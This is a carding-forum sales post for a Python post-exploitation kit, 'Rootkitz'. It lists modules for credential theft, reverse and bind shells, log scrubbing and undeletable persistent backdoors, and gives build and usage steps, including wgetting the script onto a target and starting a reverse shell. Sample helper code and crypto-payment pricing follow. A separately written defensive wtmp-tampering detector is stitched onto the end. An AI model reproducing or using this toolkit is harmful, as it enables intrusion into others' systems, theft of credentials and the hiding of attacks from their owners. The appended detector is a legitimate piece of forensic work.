Carder.life > [en] International Forum > Hacking & Coding

03-23-2025, 05:51 AM
Bradega
Join Date: Jan 2025
Posts: 0

Rootkitz Exploit Framework - 1.0
Coded In Python


: Modules :
archive
Creates a tar archive of any files located within the session's temporary directory.
creds
Gather user and system credentials. Looks for passwords, SSH keys, SSL certs, certain application creds, user histories and more.
privsec
Checks the Linux kernel for the existence of possible privilege escalation exploits. Provides CVE and download link if available. Will help gain uid=0 on host.
extras
Searches for system, service and app configurations. Also tries to locate certain installed apps and protection measures.
network
Collects network information such as listening ports, DNS info, active connections, firewall rules, etc.
reversexor
Opens a reverse XOR ciphered TCP shell to a remote host. Interactive shell with download/upload and remote module execution.
scrub
Attempts to remove the currently logged in username and IP address from utmp, wtmp and lastlog. Intrusive method.
bshell
Starts a TCP bind shell on the target system. Interactive shell with download/upload, cd and ability to execute other modules remotely.
daemon
Daemonize a R00TK1TZ script. When executed you'll be given the PID to monitor or kill the task if needed.
lanmap
Uses Scapy to enumerate live hosts and gather IP addresses.
osuser
Enumerate Linux distro, kernel, installed apps and services, printers, cronjobs, user lists and history files, CPU and memory info, etc.
rshell
Opens a reverse TCP shell to a remote host. Interactive shell with download/upload and remote R00TK1TZ module execution.
xorshell
Starts a TCP bind shell on the target system. Interactive shell with download/upload, cd and ability to execute other modules remotely.
aeshttp
Starts a reverse HTTP shell with AES encryption that will connect back to a remote host.
getrepos
Tries to find various source code repositories and management tools. Git, SVN.
openshares
Uses smbclient to find open SMB shares on a specified host.
portscan
Very simple port scan. Scans ports 1 - 1000 on the specified IP. Best used against LAN hosts.
sniff
Runs an advanced network packet sniffer on the target.
webproxy
Starts a basic HTTP proxy on the target system.
xmpp
Spawn XMPP server on host (Experimental)
egressbuster
Checks a range of ports to find available outbound ports. Used to break egress filters.
icmpshell
Starts an ICMP shell on the target system.
persistent
Installs any R00TK1Tz shell module as a persistent backdoor. Will start shell on every system reboot.
udpbind
Starts a UDP bind shell on port 21541. Interactive shell access with additional R00TK1TZ commands. Use the UDP-Client in Shell/ to connect.
xmlcrack
Sends hash list to remote XMLRPC server for cracking. Crackserver.py must be running on the remote host.

Create.py is a menu-driven script that guides you through the process of building your custom exploit script.
When you start Create you will be brought to the Main Menu, where you can choose whether to build a new script, import a new module or view a list of all currently available modules within the Custom and Standard directories. Within any menu of Create, you can type ':help' to be presented with a detailed list of commands for the specific menu you are in. You can also type ':exit' or ':quit' at any menu to be brought back to the Main Menu, or to completely exit the application if you are already there.
Main Menu:
1 => Create Custom Attack Script
2 => List All Available Modules
3 => Load Custom Plugin Module
4 => Check for updates
5 => Exit Creation Utility

The entire purpose of RootK1tz 1.0 is to help you create custom post-exploitation scripts. This is done by using the
Create application and selecting option '1' from the Main Menu.
After you select the first option from the Main Menu, you'll be presented with a quick tutorial on how the creation
process works and how to add modules to your script.
Enter the name of each module you wish to add to your script, pressing [enter] after each addition.
Once you've added everything you want included, type ':create' to start the build process.
You'll then be prompted to enter a name for your script and define some options for things like encryption keys and ports.
The entries will be checked to make sure they are valid. If you enter an invalid IP address or port, you will be notified and asked to re-enter the correct information.
After all the options are saved, your script will be built.
You'll be shown a list of all the modules that were built into the script and the location where the final product is
saved.
[Example of :create command]
=> :create
Enter a name for your RootK1tz script. The finished script will be placed in the Scripts directory.
Do not include Python file extension.
=> Demo
Script will be saved as /home/user/RootK1tz-1.0/Scripts/Demo.py
Configure Options:
If any of these options don't apply to you, press [enter] to ignore them.
bind port => 4444
[] bind port saved.
remote host =>
[] remote host saved.
remote port =>
[] remote port saved.
proxy port =>
[] proxy port saved.
xor cipher key =>
[] xor key saved.
bshell
extras
network
[] Your custom RootK1tz script has been created!
Location: /home/userlocation
[ Using your custom RootK1tz script ]
There is a large variety of ways you can use your RootK1tz script. The options are only limited by the modules you
choose for each script.
The most straight-forward and common method of use is uploading or downloading the RootK1tz script onto a target system
and then running the post-exploitation automation tasks right from the command line.
If you do not have direct shell access, you can still make full use of RootK1tz and run any of the included modules over any of the remote shells (TCP, XOR, ICMP, UDP, AES, etc.), via a web application for example.
In that case, simply wget the RootK1tz script onto the target box and execute "./RootK1tz.py --rshell", for example.
The backdoors can be used with any of the shell modules. They will survive reboots and can only be removed by using your custom removal script (not even root users can modify or delete the backdoor files).

SAMPLE SCRIPT
Code:
#!/usr/bin/python
# R00TK1TZ V1.0
# Author - R00TK1TZ
# payload Create.py
# Python 2 script (urllib2, thread, SocketServer). Temp_Dir, Logging and
# ActivityLog are not defined in this excerpt: Create.py writes them into the
# generated script together with the remote-shell settings chosen at build time.
import sys, os, re, signal
from subprocess import Popen, PIPE, STDOUT, call
import platform
import shutil
import getopt
import tarfile
import socket
import urllib2
import random, string
import logging
import struct
import getpass
import pwd
import thread
import base64
import operator
import SocketServer, SimpleHTTPServer
from math import log

# Truncate a NUL-padded fixed-width field (used when reading utmp records)
cut = lambda s: str(s).split("\0", 1)[0]

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
try:
    from scapy.all import *
except ImportError:
    try:
        from scapy import *
    except ImportError:
        print("Scapy is not installed. It can be downloaded here => https://www.secdev.org/projects/scapy/\n")


def environment():
    global Home_Dir
    global User_Ip_Address
    global UTMP_STRUCT_SIZE
    global LASTLOG_STRUCT_SIZE
    global UTMP_FILEPATH
    global WTMP_FILEPATH
    global LASTLOG_FILEPATH
    global distro
    global distro2
    global currentuser
    ## Global variables for remote shells are defined during the creation process
    ## Variables for Scrub module. Do not change unless you know what you're doing.
    ## (record sizes match glibc's struct utmp / struct lastlog on x86_64)
    UTMP_STRUCT_SIZE = 384
    LASTLOG_STRUCT_SIZE = 292
    UTMP_FILEPATH = "/var/run/utmp"
    WTMP_FILEPATH = "/var/log/wtmp"
    LASTLOG_FILEPATH = "/var/log/lastlog"
    distro = os.uname()[1]                        # nodename (hostname), despite the variable name
    distro2 = platform.linux_distribution()[0]    # distribution name
    Home_Dir = os.environ['HOME']
    User_Ip_Address = socket.gethostbyname(socket.gethostname())
    if os.geteuid() != 0:
        currentuser = "nonroot"
    else:
        currentuser = "root"
    signal.signal(signal.SIGINT, signalHandler)
    os.system("clear")
    if os.path.exists(Temp_Dir):
        os.chdir(Temp_Dir)
    else:
        os.mkdir(Temp_Dir)
        os.chdir(Temp_Dir)
    print("[!] Reports will be saved in: %s" % Temp_Dir)
    if Logging == "yes":
        global logtime
        global now
        import datetime
        now = datetime.datetime.now()
        logtime = (str(now.month)+"-"+str(now.day)+"-"+str(now.year)+" @ "+str(now.hour)+":"+str(now.minute))
        print("[!] Logging is enabled. ActivityLog located in %s" % ActivityLog)
        open(ActivityLog, "a").close()    # create the log file (was: os.system("touch ..."))
        write2file(ActivityLog, "\nR00TK1TZ Framework\nCustom script activity log\nStart Time: %s\n\n" % logtime)


def signalHandler(signum, frame):
    if Logging == "yes":
        write2file(ActivityLog, "\n [!] Ctrl-C caught. Shutting down!")
    print("[!] Ctrl-C caught, shutting down now")
    Shutdown()


def Shutdown():
    # Drop an activity log that holds nothing but its header, then remove the
    # temporary directory if no reports were written into it.
    if Logging == "yes":
        if os.stat(ActivityLog).st_size < 79:
            os.remove(ActivityLog)
            if not os.listdir(Temp_Dir):
                os.rmdir(Temp_Dir)
    else:
        if not os.listdir(Temp_Dir):
            os.rmdir(Temp_Dir)
    sys.exit()


def whereis(program):
    # Locate an executable on PATH, like `which`
    for path in os.environ.get('PATH', '').split(':'):
        candidate = os.path.join(path, program)
        if os.path.exists(candidate) and not os.path.isdir(candidate):
            return candidate
    return None


def copy2temp(filename, subdir=""):
    # Copy a readable file into Temp_Dir, or into a subdirectory of it
    # (created on demand). Missing or unreadable files are skipped silently.
    if not (os.path.exists(filename) and os.access(filename, os.R_OK)):
        return
    if subdir == "":
        dest = Temp_Dir
    elif os.path.exists(Temp_Dir + "/" + subdir):
        dest = Temp_Dir + "/" + subdir
    elif os.path.exists(subdir):
        dest = subdir
    else:
        dest = Temp_Dir + "/" + subdir
        os.mkdir(dest)
    shutil.copy2(filename, dest)
    if Logging == "yes":
        write2file(ActivityLog, "\n %s copied to: %s " % (filename, dest))


def write2file(filename, text):
    # Append to an existing, writable file; silently ignore anything else
    if os.path.exists(filename) and os.access(filename, os.W_OK):
        target = open(filename, "a")
        target.write(text)
        target.close()


def writenew(filename, content):
    new = open(filename, "a")
    new.write(content)
    new.close()


def file2file(readfile, writefile):
    # Append the contents of readfile to writefile; both must already exist
    if os.path.exists(readfile) and os.access(readfile, os.R_OK) \
            and os.path.exists(writefile) and os.access(writefile, os.W_OK):
        src = open(readfile)
        dst = open(writefile, "a")
        for line in src:
            dst.write(line)
        dst.close()
        src.close()
        if Logging == "yes":
            write2file(ActivityLog, "\n %s contents copied to: %s " % (readfile, writefile))


def maketemp(subdir):
    moddir = Temp_Dir + "/" + subdir
    if not os.path.exists(moddir):
        os.mkdir(moddir)
        if Logging == "yes":
            write2file(ActivityLog, "\n Temporary directory [ %s ] created" % subdir)


def users():
    # Collect login names from /etc/passwd within the UID range chosen by the author
    global userlist
    userlist = []
    if os.access('/etc/passwd', os.R_OK):
        passwd = open('/etc/passwd')
        for line in passwd:
            fields = line.split(':')
            uid = int(fields[2])
            if uid > 500 and uid < 32328:
                userlist.append(fields[0])
        passwd.close()
        if Logging == "yes":
            write2file(ActivityLog, "\n User list required for module")


def combinefiles(newfile, filelist):
    # Concatenate every readable file in filelist into newfile
    content = ''
    for f in filelist:
        if os.path.exists(f) and os.access(f, os.R_OK):
            content = content + '\n' + open(f).read()
            if Logging == "yes":
                write2file(ActivityLog, "\n %s contents added to: %s " % (f, newfile))
    if content:
        open(newfile, 'wb').write(content)


def tardir(name, directory):
    # Archive a whole directory as <name>.tar.gz
    tar = tarfile.open("%s.tar.gz" % name, "w:gz")
    if os.path.exists(directory):
        tar.add("%s/" % directory)
        print("[+] %s added to %s.tar.gz" % (directory, name))
        tar.close()
        if Logging == "yes":
            write2file(ActivityLog, "\n %s added to: %s.tar.gz " % (directory, name))
    else:
        print("[!] Could not find directory %s " % directory)
        tar.close()


def tarlist(name, filelist):
    # Archive the files in filelist as <name>.tar.gz, skipping missing ones
    tar = tarfile.open("%s.tar.gz" % name, "w:gz")
    for files in filelist:
        if os.path.exists(files):
            tar.add(files)
        else:
            print("[!] %s not found. Skipping.." % files)
    tar.close()
    print("[+] %s.tar.gz file created!" % name)
    if Logging == "yes":
        write2file(ActivityLog, "\n %s.tar.gz archive created." % name)


def log_msg(message):
    if Logging == "yes":
        write2file(ActivityLog, message)


def reaper():
    # Reap finished child processes tracked in shellPID (a list maintained by
    # the shell modules; not defined in this excerpt)
    while shellPID:
        pid, stat = os.waitpid(0, os.WNOHANG)
        if not pid:
            break
        if pid in shellPID:
            shellPID.remove(pid)

Full Support available
Payment
BTC / ETH / DASH / WM
Basic Package with all modules listed above
$100 - Includes Updates
Advanced Package with additional modules and CVE buster
$150 - Includes Updates
Custom Modules Available
$50 per module
Jabber - [email protected]
(root with zeros, not letter o)

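An added example, not from the post or the framework: the scrub module above edits utmp, wtmp and lastlog in place, and the sample script hard-codes the 384-byte glibc x86_64 utmp record size it works with. The Python 3 parser below reads a wtmp image record by record using that layout and flags the shapes an in-place edit leaves behind: a login record with a blank username, a logout with no matching login, a record whose type was zeroed while its other fields remain, and a timestamp running backwards in a file that is only ever appended to. The wtmp image is constructed inline, the field layout assumes glibc on x86_64, and the heuristics are the editor's, not the post's.

```python
import struct
from collections import namedtuple

# glibc x86_64 `struct utmp`: 384 bytes, the same UTMP_STRUCT_SIZE the sample script hard-codes.
# Field order follows <utmp.h>: ut_type, ut_pid, ut_line, ut_id, ut_user, ut_host,
# ut_exit (two shorts), ut_session, ut_tv (sec, usec), ut_addr_v6[4], 20 unused bytes.
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)   # 384

EMPTY, USER_PROCESS, DEAD_PROCESS = 0, 7, 8

Record = namedtuple("Record", "ut_type pid line user host tv_sec")


def _cstr(raw: bytes) -> str:
    """Decode a NUL-padded fixed-width field."""
    return raw.split(b"\0", 1)[0].decode("ascii", "replace")


def pack_record(ut_type, pid, line, user, host, tv_sec) -> bytes:
    """Build one 384-byte record; used here only to construct sample data."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, tv_sec, 0, 0, 0, 0, 0)


def parse_records(buf: bytes):
    """Split a utmp/wtmp image into Record tuples; a partial trailing record is itself suspicious."""
    if len(buf) % UTMP_SIZE:
        raise ValueError("file length %d is not a multiple of %d" % (len(buf), UTMP_SIZE))
    out = []
    for off in range(0, len(buf), UTMP_SIZE):
        f = struct.unpack_from(UTMP_FMT, buf, off)
        out.append(Record(f[0], f[1], _cstr(f[2]), _cstr(f[4]), _cstr(f[5]), f[9]))
    return out


def find_tampering(records):
    """Return (index, reason) pairs for records that look edited rather than appended."""
    findings = []
    logins = set()      # (line, pid) pairs that had a USER_PROCESS record
    last_ts = 0
    for i, r in enumerate(records):
        if r.ut_type == USER_PROCESS:
            logins.add((r.line, r.pid))
            if not r.user:
                # a login record never has an empty ut_user; the name was overwritten
                findings.append((i, "USER_PROCESS with blank ut_user (host=%r)" % r.host))
        elif r.ut_type == DEAD_PROCESS:
            if (r.line, r.pid) not in logins:
                # the logout survived but its login record was removed
                findings.append((i, "DEAD_PROCESS on %s/pid %d without prior login" % (r.line, r.pid)))
        elif r.ut_type == EMPTY and (r.pid or r.line or r.tv_sec):
            # ut_type cleared but the rest of the record left behind
            findings.append((i, "EMPTY record with residual pid/line/timestamp"))
        if r.tv_sec:
            if r.tv_sec < last_ts:
                # wtmp is append-only; a timestamp going backwards means the file was rewritten
                findings.append((i, "timestamp %d earlier than previous %d" % (r.tv_sec, last_ts)))
            last_ts = max(last_ts, r.tv_sec)
    return findings


# Constructed wtmp image (not captured from a real host): two clean records, then
# four shapes of edit that an in-place utmp/wtmp scrub leaves behind.
SAMPLE_WTMP = b"".join([
    pack_record(USER_PROCESS, 1001, "pts/0", "alice", "203.0.113.5", 1000),
    pack_record(DEAD_PROCESS, 1001, "pts/0", "", "", 1100),              # normal logout
    pack_record(USER_PROCESS, 1002, "pts/1", "", "198.51.100.7", 1200),  # user wiped, host left
    pack_record(DEAD_PROCESS, 1003, "pts/2", "", "", 1300),              # login record deleted
    pack_record(EMPTY, 1004, "pts/3", "", "", 1350),                     # type zeroed, residue kept
    pack_record(USER_PROCESS, 1005, "pts/4", "bob", "192.0.2.9", 900),   # out of order
])

if __name__ == "__main__":
    for idx, why in find_tampering(parse_records(SAMPLE_WTMP)):
        print("record %d: %s" % (idx, why))
```

To run it against a real file, read /var/log/wtmp into `buf` and pass it to `parse_records`; on a 32-bit or non-glibc system the record layout differs and `UTMP_FMT` has to be adjusted first. The checks are heuristics: a wtmp that was rotated or truncated by logrotate can also produce an orphan logout, so a finding is a lead for cross-checking against auth logs and lastlog, not proof on its own.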